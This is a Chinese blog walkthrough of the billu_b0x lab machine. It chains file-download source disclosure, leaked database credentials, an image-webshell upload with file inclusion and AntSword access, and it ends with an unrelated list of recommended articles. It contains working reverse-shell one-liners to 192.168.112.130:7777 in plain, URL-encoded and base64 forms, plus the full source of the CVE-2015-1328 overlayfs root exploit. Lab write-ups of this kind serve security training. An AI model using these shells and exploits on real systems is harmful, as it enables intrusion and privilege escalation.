tpaer
tpaer

billu_b0x靶场通关

billu靶场通关

靶机ip:192.168.112.134

信息收集

端口开放

80

目录扫描

images目录存在目录遍历
test.php(任意文件下载)
add.php(文件上传)
index.php(主页)
head.php
show.php
c.php

billu_b0x靶场通关_第1张图片

这个工具的字典不全,换py脚本重新扫多出了以下目录

phpmy
in
panel.php

渗透阶段

发现test.php存在任意文件下载,利用该漏洞读取其他文件

index.php
billu_b0x靶场通关_第2张图片


session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
	
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '

--==[[ billu b0x ]]==-- 



Show me your SQLI skills 



Username :-    Password:-  


';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
	   echo "You are allowed
";
	   $_SESSION['logged']=true;
	   $_SESSION['admin']=$row['username'];
	   
	 header('Location: panel.php', true, 302);
   
}
else
{
	echo "";
}
	
}
echo "B0X Powered By Pirates ";

?>

add.php
billu_b0x靶场通关_第3张图片




echo '
    Select image to upload:
    
	
	
	
    
';



?>

test.php

billu_b0x靶场通关_第4张图片




function file_download($download)
{
	if(file_exists($download))
				{
					header("Content-Description: File Transfer"); 
					
					header('Content-Transfer-Encoding: binary');
					header('Expires: 0');
					header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
					header('Pragma: public');
					header('Accept-Ranges: bytes');
					header('Content-Disposition: attachment; filename="'.basename($download).'"'); 
					header('Content-Length: ' . filesize($download));
					header('Content-Type: application/octet-stream'); 
					ob_clean();
					flush();
					readfile ($download);
				}
				else
				{
				echo "file not found";	
				}
	
}

if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{

echo '\'file\' parameter is empty. Please provide file path in \'file\' parameter ';
}

show.php

billu_b0x靶场通关_第5张图片


include('c.php');

if(isset($_POST['continue']))
{
	$run='select * from users ';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
echo "";while($row=mysqli_fetch_assoc($result)){echo'';}echo"
IDUserAddressImage

    
   
	    
'.$row['id'].''.htmlspecialchars ($row['name'],ENT_COMPAT).''.htmlspecialchars ($row['address'],ENT_COMPAT).'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px>


    
";
}
}

?>

c.php

billu_b0x靶场通关_第6张图片


#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>

在阅读完源码后进行代码审计

在c.php代码中发现了数据库的连接信息,但没扫出3306端口有可能站库分离,或者端口未开放都有可能

mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

但后面在phpmy目录发现了phpMyAdmin的登录入口

billu_b0x靶场通关_第7张图片

直接用c.php中的密码进行连接,成功进入后台。在后台ica_lab数据库的auth表中发现一个账号
billu_b0x靶场通关_第8张图片

在in路径是phpinfo泄露,想尝试直接写入webshell到网站根路径但操作失败

在这里插入图片描述

使用账号密码在index.php页面进行登录

billu_b0x靶场通关_第9张图片

之后跳转到panel.php页面点击continue展示了一些相关信息

选择Add User点击continue,发现可以上传文件

利用任意文件下载读取panel.php

panel.php

billu_b0x靶场通关_第10张图片


session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
		header('Location: index.php', true, 302);
		exit();
	
}



echo "Welcome to billu b0x ";
echo '
';
if(isset($_POST['lg']))
{
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
}
echo '

';

echo '


 

  


';
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}


if(isset($_POST['upload']))
{
	
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);
	
	if(!empty($_FILES['image']['name']))
	{
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
	$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
				{
					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
							 {
							  echo "Uploaded successfully ";
							  $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; 
							 mysqli_query($conn, $update);
							  
							}
				}
			else
			{
				echo "
i told you dear, only png,jpg and gif file are allowed";
			}
	}
	else
	{
		echo "
only png,jpg and gif file are allowed";
		
	}
}


}

?>

阅读panel.php的源码,发现在上传界面有后缀白名单校验不是很好绕过,同时存在文件包含include函数

我们直接绕过上传图片马,图片保存在uploaded_images目录下

billu_b0x靶场通关_第11张图片

利用panel文件包含进行绕过

billu_b0x靶场通关_第12张图片

测试成功后蚁剑连接getshell
billu_b0x靶场通关_第13张图片

需要配置header以及body

billu_b0x靶场通关_第14张图片

在这里插入图片描述

提权阶段

蚁剑是半交互式的,升级shell到交互式

反弹bash命令需要进行编码处理,直接反弹失败

从Ubuntu 6.10开始,默认使用shell是 dash 而不是 bash 。dash只有运行脚本的能力,而没有交互能力,所以需要指定bash,来进行命令执行。

以下给出几种可以直接反弹的方法

需要注意system(“xxx”)如果是双引号payload是单引号,如果是system(‘xxx’)单引号则payload需要对双引号进行编码

1.使用bash -c

bash -c 'bash -i >& /dev/tcp/192.168.112.130/7777 0>&1'

需要url编码

%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%32%2e%31%33%30%2f%37%37%37%37%20%30%3e%26%31%27

billu_b0x靶场通关_第15张图片

或者对特殊字符编码

bash+-c+%27bash+-i+%3E%2Fdev%2Ftcp%2F192.168.112.130%2F7777+0%3E%261%27

billu_b0x靶场通关_第16张图片

2.使用管道符 | bash

echo "bash -i >& /dev/tcp/192.168.112.130/7777 0>&1" | bash

url编码

%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%32%2e%31%33%30%2f%37%37%37%37%20%30%3e%26%31%22%20%7c%20%62%61%73%68

3.base64

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMi4xMzAvNzc3NyAwPiYx" | base64 -d | bash

url编码

%65%63%68%6f%20%22%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%45%78%4d%69%34%78%4d%7a%41%76%4e%7a%63%33%4e%79%41%77%50%69%59%78%22%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68

进入交互式shell

python -c "import pty;pty.spawn('/bin/bash');"

进行内核提权

查看内核版本

cat /etc/issue

在这里插入图片描述

上传漏洞exp 37292.c至tmp目录

 Exploit Database
Exploit Database

    Exploits

    GHDB

    Papers

    Shellcodes

    Search EDB

    SearchSploit Manual

    Submissions

    Online Training

Exploit Database

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
EDB-ID:
37292
CVE:
2015-1328

EDB Verified:
Author:
rebel
Type:
local

Exploit:   /  
Platform:
Linux
Date:
2015-06-16

Vulnerable App:

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
            

Copy
Tags:
Advisory/Source: Link
Downloads 	Certifications 	Training 	Professional Services
Kali Linux 	OSCP 	Penetration Testing with Kali Linux (PWK) (PEN-200)
All new for 2020 	Penetration Testing
Kali NetHunter 	OSWP 	Offensive Security Wireless Attacks (WiFu) (PEN-210) 	Advanced Attack Simulation
Kali Linux Revealed Book 	OSEP 	Evasion Techniques and Breaching Defences (PEN-300)
All new for 2020 	Application Security Assessment
	OSWE 	Advanced Web Attacks and Exploitation (AWAE) (WEB-300)
Updated for 2020 	
	OSED 	Windows User Mode Exploit Development (EXP-301)
All new for 2021 	
	OSEE 		
	KLCP 	[Free] Kali Linux Revealed 	

    Exploit Database by Offensive Security Terms Privacy About Us FAQ Cookies 

© OffSec Services Limited 2023. All rights reserved.

执行命令

gcc 37292.c -o ofs
./ofs

billu_b0x靶场通关_第17张图片

你可能感兴趣的:(从入门到入狱,php,服务器,安全,web安全)

  • 【SpringBoot】SpringBoot优雅停机机制 总是学不会. SpringBootspringboot后端java优雅停机
    文章目录背景1.什么是优雅停机?2.SpringBoot优雅停机的基础实现2.1立即停机模式2.2优雅停机模式3.核心机制解析3.1.启用ShutdownHook3.2.自定义资源释放逻辑3.3.超时机制4.优雅停机的实际应用场景4.1.服务更新4.2.流量调控4.3.订单处理5.优雅停机可能失效的情况6.实现无感知上下线总结背景想象一下,你正在乘坐一辆出租车,突然司机说:“车到一半我得下班了,您
  • 从“记住我”到 Web 认证:Cookie、JWT 和 Session 的故事 总是学不会. 系统设计场景前端后端java开发
    文章目录1.初识HTTP:一场没有记忆的对话2.Cookie:网站的“记忆”3.Session:服务端的“记忆”4.JWT:让用户自己带着“身份证”5.CookievsSessionvsJWT总结6.最终选择:用对工具才是关键!你学到了什么?1.初识HTTP:一场没有记忆的对话小明最近开发了一个旅游网站,每天有很多用户访问。但他发现了一个问题:用户登录后,刷新一下页面就得重新登录?!他百思不得其解
  • Token相关设计 总是学不会. 系统设计场景java开发前端
    文章目录1.双Token机制概述1.1访问令牌(AccessToken)1.2刷新令牌(RefreshToken)2.双Token认证流程3.SpringBoot具体实现3.1生成Token(使用JWT)3.2解析Token3.3登录接口(返回双Token)3.4刷新Token接口3.5退出登录4.总结在微服务架构中,Token认证是保障系统安全性的重要手段,常见的方式包括JWT(JSONWebT
  • SpringBoot项目:前后端打包与部署(使用 Maven) 总是学不会. mavenjava前端后端服务器
    文章目录IDEA后端打包与部署(使用Maven)1.确保Maven已安装,并引入pom插件2.清理并安装项目3.定位生成的JAR包和配置文件4.创建部署文件夹5.上传到服务器前端打包与部署(使用npm)1.确保Node.js和npm已安装2.安装依赖3.构建生产环境代码4.准备部署文件夹5.上传到服务器自动化的想法可能出现的异常参考IDEA后端打包与部署(使用Maven)1.确保Maven已安装,
  • 《深入浅出TCP之4TCP是一种流协议》 kaydxh tcp网络协议网络tcpip
    4TCP是一种流协议数据是以字节流的形式传递给接收者,没有固有的报文或报文边界分概念。send通常只是将数据复制到主机的tcp/ip栈中,就返回了,由tcp来决定需要立即发送多少数据(取决于,发送窗口,拥塞窗口,MSS等)tcp会记录它发送了多少字节,以及确认的字节,但它不会记录这些字节是如何分组的变长报文,一般在每条报文前面加上一个首部,这个首部至少包含报文的长度,首先读取定长的报文头部,从首部
  • Python 基础(三):入门必备知识的思考与对之前内容的总结 AI自学kuke-v Python教学python开发语言
    1思考前两节我们讲了input,print()还有变量与数据类型的用法,但是我发现可学习性还是比较低。无法让大家系统的掌握Python这门语言的入门语法。那么为什么要系统的掌握语法呢?因为系统的掌握语法后,当我们想要用到这一知识点的时候,我们就可以迅速的找到相应的处理方法,从而更加方便与快捷的解决我们遇到的问题,不至于我们到用到的时候再去寻找相关的处理方法,所以我讲的内容要尽可能的高度地相关性、全
  • 杨老师的照相排列 可达鸭s15192 可达鸭J3题目coduck可达鸭·勰码教育可达鸭
    题目描述有N个学生合影,站成左端对齐的k排,每排分别有N1,N2,……,NK个人。(N1>=N2>=……>=NK)第1排站在最后边,第k排站在最前边。学生的身高互不相同,把他们从高到底依次标记为1,2,…,N。在合影时要求每一排从左到右身高递减,每一列从后到前身高也递减。问一共有多少种安排合影位置的方案?下面的一排三角矩阵给出了当N=6,k=3,身高从高到低进行编号,编号为1的同学身高最高。我们得
  • 网络安全员证书 黑客KKKing 计算机网络安全网络工程师web安全网络安全
    软考网络安全员证书:信息安全领域的黄金标准随着信息技术的飞速发展,网络安全问题日益凸显,网络安全员的需求也日益增加。软考网络安全员证书作为信息安全领域的黄金标准,对于网络安全从业者来说具有重要意义。本文将详细介绍软考网络安全员证书的背景和意义、获得要求、价值以及备考建议,为有意向参加软考网络安全员证书考试的人员提供参考。一、引言随着网络攻击和数据泄露事件的频繁发生,企业对网络安全人才的需求不断增长
  • 使用深度学习模型U-Net进行训练基于哨兵2的作物分割数据集。PyTorch框架为例,如何构建和训练U-Net模型来完成基于哨兵2的作物分割检测 计算机C9硕士_算法工程师 分割数据深度学习pytorch人工智能
    使用深度学习模型如U-Net进行训练基于哨兵2的作物分割。PyTorch框架为例,如何构建和训练U-Net模型来完成基于哨兵2的作物分割检测基于哨兵2的作物分割,共18种作物类型(背景,草地,软冬小麦,玉米,冬季大麦,冬季油菜,春季大麦,向日葵,葡萄藤,甜菜,冬季小黑麦,冬季硬质小麦,水果、蔬菜、花卉,土豆,豆科饲料,大豆,果园,混合谷物,高粱),38到61个不同时间段同一位置10通道多光谱图像,
  • 【Burp入门第三十六篇】加解密实现短信轰炸实战案例 秋说 Burp漏洞挖掘
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录背景加解密短信轰炸背景在针对目标应用程序的测试中,发现其密码找回功能存在请求加密机制,具体表现为用户通过手机号获取验证码的请求数据包采用了加密传输:加解密通
  • 【Burp入门第三十三篇】BurpSuite+Proxifier安装配置,实现微信小程序抓包 秋说 BurpSuite渗透工具Proxifier
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录下载配置下载汉化版下载地址:https://get-shell.com/1506.html#hidden-box-comment解压后双击exe文件:
  • 【网络安全 | 扫描子域+发现真实IP】CloakQuest3r安装使用详细教程 秋说 网安渗透工具使用教程(全)web安全子域名扫描渗透工具
    原创文章,禁止转载。本文仅作学习交流使用,不得用于非法渗透,笔者不承担任何责任。文章目录简介功能介绍执行流程限制安装步骤可选功能:SecurityTrailsAPI使用示例简介CloakQuest3r是一款强大的Python工具,专为揭示受Cloudflare及类似服务保护的网站真实IP地址而设计。Cloudflare作为广泛应用的Web安全与性能优化服务,其防护机制可隐藏网站的实际IP,而Clo
  • C# 牵手DeepSeek:打造本地AI超能力 步、步、为营 c#人工智能开发语言
    一、引言在人工智能飞速发展的当下,大语言模型如DeepSeek正掀起新一轮的技术变革浪潮,为自然语言处理领域带来了诸多创新应用。随着数据隐私和安全意识的提升,以及对模型部署灵活性的追求,本地部署DeepSeek成为众多开发者和企业关注的焦点。对于C#开发者而言,将DeepSeek模型本地部署并集成到C#项目中,不仅能充分发挥C#语言在Windows平台开发的优势,还能实现高度定制化的人工智能应用,
  • 【网络安全 | 渗透工具】小程序反编译分析源码 | 图文教程 秋说 网安渗透工具使用教程(全)web安全漏洞挖掘小程序
    未经许可,禁止转载。本文仅供学习使用,严禁用于非法渗透测试,笔者不承担任何责任。文章目录1、下载Proxifier2、下载反编译工具unveilr3、寻找小程序文件包4、对文件包进行反编译5、对源码进行分析6、渗透思路6.1、查找敏感信息泄露6.2、解析加解密逻辑6.3、枚举API接口并测试反编译是通过逆向工程将小程序包还原为接近源代码的形式。这一过程能够帮助我们提取大量有价值的信息,从而辅助漏洞
  • 量化投资策略的生命周期:从设计到淘汰 云策量化 量化投资自动化交易程序化炒股量化炒股miniQMT量化交易QMT量化投资deepseek
    推荐阅读:《程序化炒股:如何申请官方交易接口权限?散户可以申请吗?》量化投资策略的生命周期:从设计到淘汰量化投资,这个听起来既神秘又充满科技感的领域,其实离我们并不遥远。它就像是金融市场中的“算法猎人”,通过数学模型和计算机程序来寻找投资机会。那么,一个量化投资策略是如何从无到有,再到最终被淘汰的呢?让我们一起探索这个策略的生命周期。1.策略的诞生:设计阶段1.1灵感的火花量化投资策略的诞生往往始
  • Grails+Spring Security 所遇到的几个问题(1) xplidelphi Grailsspringgrailsjava
    安全是每个实际的应用所必需面对的问题。但是,安全是个技术活,没有相当的功底是搞不定的。况且,DRY(don'trepeatyourself)一直是我们的信条。所以,SpringSecurity成了一个非常不错的选项。Grails约定优先的策略能够带来很大的便利,于是,两者的结合就是顺理成章的事情。网上相关的帖子很多,经测试,总结下来是这样几个步骤。创建Grailsig程序不多赘述。以下的步骤是在程
  • 【Java基础】Java 中的枚举类 李少兄 Javajavapython数据库
    一、前言在Java编程中,枚举类(enum)是一个非常实用且强大的特性,自Java5引入以来,它为开发者提供了一种优雅的方式来表示一组固定的常量。枚举类主要用于信息标志和分类,能显著提升代码的可读性、可维护性和安全性。二、枚举类基础概念(一)枚举类的定义枚举类使用enum关键字来定义,它是一种特殊的类,用于封装一组固定的常量。以下是一个简单的示例:enumSeason{SPRING,SUMMER,
  • Windows Server 2016-Windows控制台的新增功能 weixin_34377065
    控制台主机(支持所有字符模式的应用程序的基础代码,包括Windows命令提示符、WindowsPowerShell提示符等)已通过几种方式进行更新,以添加各种新功能。控制新功能新功能为默认启用,但可以通过"属性"界面(主要是在"选项"选项卡上)或使用这些注册表项(所有表项都是HKEY_CURRENT_USER\Console下的DWORD值)打开和关闭每个新功能或恢复到以前的控制台主机:注册表项说
  • http 模块 咖啡の猫 node.js后端
    在现代Web开发中,处理HTTP请求和响应是构建网络应用的核心部分。Node.js提供了一个强大的内置模块——http模块,使得开发者能够轻松创建服务器并处理客户端请求。本文将详细介绍http模块的基础知识、主要功能以及如何利用它来实现基本的Web服务器。什么是http模块?http模块是Node.js提供的一个核心模块,用于创建HTTP服务器与客户端。通过该模块,你可以编写服务器端代码来监听HT
  • Python进程知多少 我的身前一尺是我的世界 Pythonpython进程python多进程python进程共享内存python服务器进程python进程通信
    目录目标Python版本官方文档概述进程(Process)的基本概念进程之间的通信方法进程同步进程间共享状态实战创建进程的基本语法创建进程并传递复杂的参数进程同步&进程通信共享内存基于服务器进程实现共享基于队列实现进程安全生产者&消费者模型(基于队列)生产者&消费者模型(基于管道)目标掌握进程的基本概念和使用方法,包括:创建进程、进程同步、进程间共享状态、进程通信。Python版本Python3.
  • 【Kubernetes】 Scheduler 的逻辑:从 Predicates/Priorities 到 Filter/Score 还没入门的大菜狗 kubernetes
    Kubernetes调度框架的演进:从Predicates/Priorities到Filter/ScoreKubernetes调度框架从传统的Predicates(预选)和Priorities(优选)转变为现代的Filter和Score扩展点是在Kubernetes1.15到1.18这个时期逐步完成的。演进时间线Kubernetes1.15(2019年6月发布)首次引入调度框架(Schedulin
  • 单点登录和普通登录的区别,来自百度AI的解释 mf_717714 前端
    注意,以下回答均是百度AI伙伴回答,非博主的回答,仅供参考。1,什么是单点登录单点登录(SingleSignOn,简称SSO)是指在多个应用系统中,用户只需要登录一次就可以访问所有相互信任的应用系统。当用户在身份认证服务器上登录一次以后,即可获得访问单点登录系统中其他关联系统和应用软件的权限,同时这种实现不需要管理员对用户的登录状态或其他信息进行修改。2,单点登录有哪些实现方式?SSO的实现方式有
  • Spring Web MVC⼊⻔ 想进大厂的小王 Spring组件mvc服务器javaspringintellij-ideajava-eespringboot
    一、Web开发的基础概念介绍1.socket定义:Socket是网络编程的一个基础概念,代表了两个程序(通常是网络上的不同计算机上的程序)之间的一个通信端点。用途:Sockets主要用于实现低级的网络通信功能。在Java中,java.net.Socket类用于创建一个客户端,而java.net.ServerSocket类用于创建服务器端。通过这些类,可以实现两个应用程序之间的双向通信。特点:Soc
  • 【TypeScript】ts在vue中的使用 咔咔库奇 #TypeScripttypescriptvue.jsjavascript
    目录一、Vue3+TypeScript1.项目创建与配置项目创建关键配置文件2.完整项目结构示例3.组件Props类型定义4.响应式数据与Ref5.Composition函数复用二、组件开发1.组合式API(CompositionAPI)2.选项式API(OptionsAPI)三、Vue2+TypeScript1.安装依赖2.类组件(VueClassComponent)3.Vuex类型安全四、状态
  • Kubernetes-v1.26.3(kubeadm)部署 wxwopt kubelet
    1.k8s基础系统环境配置1.1.环境准备CentOSLinuxrelease7.9.2009(Core)IPHOSTNAME操作系统192.168.10.131k8s-master01CentOS7.9192.168.10.132k8s-master02CentOS7.9192.168.10.133k8s-node01CentOS7.9注意:集群安装时会涉及到三个网段:宿主机网段:就是安装k8s
  • C语言排序算法 只有月亮知道 排序算法c语言算法
    这篇文章总结一下C语言数据结构中常见的几种排序算法。1.直接插入排序直接插入排序的算法思想是,从第二个元素开始,逐个将元素插入到已排序部分。对于每个待插入元素,从后向前扫描已排序部分,找到合适的位置并插入voidInsertSort(int*a,intn){for(inti=1;i=0)//挨个遍历判断大小{if(temp1){gap/=2;//当gap为1时,就为直接插入排序for(inti=0
  • 前端开发核心知识点深度解析:从CSS到Vue的全面指南 A_cot cssvue.js前端开发语言javascript
    一、CSS篇1.link与@import的区别加载方式:是HTML标签,并行加载;@import是CSS语法,串行加载兼容性:@import不支持IE5以下DOM控制:link可通过JS操作DOM修改,@import不可动态修改权重计算:@import引入的样式优先级低于link@importurl('style.css');二、JavaScript篇2.原型链机制原型对象:每个函数都有proto
  • mongodb副本集1主2从节点的配置方法示例 行思理 数据库运维mongodb数据库
    配置MongoDB副本集(1主节点+2从节点)的步骤如下:环境准备3台服务器,分别运行MongoDB实例。确保服务器之间网络互通。安装MongoDB(版本需一致)。配置步骤1.修改MongoDB配置文件在每个节点的mongod.conf中启用副本集功能。主节点配置(primary.conf):storage:dbPath:/var/lib/mongodbreplication:replSetNam
  • 教育培训APP开发全攻略:从网校系统源码搭建到功能优化的技术方案 万岳科技程序员小金 APP开发教学教育平台开发教育小程序软件开发APP开发在线教育系统源码教育APP开发教育平台搭建
    本篇文章,笔者将从网校系统源码搭建到功能优化的角度,全面解析教育培训APP的开发技术方案,帮助企业和开发者更好地理解如何提升在线教育平台的性能与用户体验。一、教育培训APP开发的核心架构教育培训APP的架构设计是其能否顺利运行和扩展的基础。在设计过程中,需要考虑到用户数量、数据存储、信息安全、系统响应速度等多个因素。因此,架构的选择至关重要。1、前端架构:用户体验为核心教育培训APP的前端设计直接
  • 自动化办公|xlwings与pandas交互 游客520 自动化python从入门到出家实用代码pandasexcelpython自动化
    1.介绍在数据分析和Excel自动化中,pandas作为Python处理数据的强大库,而xlwings则可以高效操作Excel。将pandas与xlwings结合使用,可以实现从Excel读取数据到DataFrame、将DataFrame写入Excel以及Excel的自动化处理。2.从Excel读取数据到PandasDataFrame2.1读取整个表格importxlwingsasxwimport
  • C/C++Win32编程基础详解视频下载 择善Zach 编程C++Win32
    课题视频:C/C++Win32编程基础详解 视频知识:win32窗口的创建                   windows事件机制 主讲:择善Uncle老师 学习交流群:386620625 验证码:625 --
  • Guava Cache使用笔记 bylijinnan javaguavacache
    1.Guava Cache的get/getIfPresent方法当参数为null时会抛空指针异常 我刚开始使用时还以为Guava Cache跟HashMap一样,get(null)返回null。 实际上Guava整体设计思想就是拒绝null的,很多地方都会执行com.google.common.base.Preconditions.checkNotNull的检查。 2.Guava
  • 解决ora-01652无法通过128(在temp表空间中) 0624chenhong oracle
    解决ora-01652无法通过128(在temp表空间中)扩展temp段的过程 一个sql语句后,大约花了10分钟,好不容易有一个结果,但是报了一个ora-01652错误,查阅了oracle的错误代码说明:意思是指temp表空间无法自动扩展temp段。这种问题一般有两种原因:一是临时表空间空间太小,二是不能自动扩展。 分析过程:    既然是temp表空间有问题,那当
  • Struct在jsp标签 不懂事的小屁孩 struct
    非UI标签介绍: 控制类标签: 1:程序流程控制标签   if   elseif    else <s:if test="isUsed"> <span class="label label-success">True</span> </
